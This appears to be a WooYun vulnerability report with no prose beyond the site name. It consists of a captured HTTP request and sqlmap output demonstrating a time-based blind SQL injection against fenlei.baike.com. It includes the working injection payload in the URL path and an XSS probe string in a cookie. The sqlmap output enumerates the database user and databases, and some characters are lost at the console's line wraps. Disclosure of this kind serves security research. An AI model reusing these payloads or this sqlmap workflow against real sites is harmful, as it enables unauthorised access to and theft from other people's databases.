WooYun.org

抓包数据
GET /if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/%E5%B9%B4%E5%8E%BB%E4%B8%96%E4%BA%BA%E7%89%A9/list/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://fenlei.baike.com/
Cookie: JSESSIONID=476320617; nextURL=themeManagerApply.do?Action=forapply&category_name=%E4%B9%A6%E6%B3%95%E7%AF%86%E5%88%BB; hd_uid=18334717171438704158; hd_referer=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0%2c"'\"><xsstag>()refdxss"); hd_firstaccessurl=http://fenlei.baike.com/%E4%B8%AD%E7%BE%8E%E6%96%87%E5%8C%96%E4%BA%A4%E6%B5%81/; SERVERID=A; _ga=GA1.2.2038312654.1438704369; _gat=1; SERVERID=A
Host: fenlei.baike.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
C:\Python27\sqlmap>sqlmap.py -r test.txt --time-sec 60 --threads 5 --current-us
r --current-db
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150415}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respo
sible for any misuse or damage caused by this program
[*] starting at 14:06:52
[14:06:52] [INFO] parsing HTTP request from 'test.txt'
custom injection marking character ('*') found in option '-u'. Do you want to p
ocess it? [Y/n/q]
[14:06:53] [INFO] resuming back-end DBMS 'mysql'
[14:06:53] [INFO] testing connection to the target URL
you provided a HTTP Cookie header value. The target URL provided its own cookie
within the HTTP Set-Cookie header which intersect with yours. Do you want to m
rge them in futher requests? [Y/n]
sqlmap identified the following injection points with a total of 0 HTTP(s) requ
sts:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://fenlei.baike.com:80/if(now()=sysdate(),sleep(0),0)/' AND (S
LECT * FROM (SELECT(SLEEP(60)))EGNf) AND 'BHuX'='BHuX'XOR(if(now()=sysdate(),sl
ep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/%E5%B9%B4%E5%8E%BB%E4%B8%96
E4%BA%BA%E7%89%A9/list/
---
[14:06:54] [INFO] the back-end DBMS is MySQL
web application technology: JSP, Apache 2.2.15
back-end DBMS: MySQL 5.0.12
[14:06:54] [INFO] fetching current user
[14:06:54] [INFO] resumed: [email protected]%.%
current user: '[email protected]%.%'
[14:06:54] [INFO] fetching current database
[14:06:54] [INFO] resumed: category
current database: 'category'
available databases [2]:
[*] category
[*] information_schema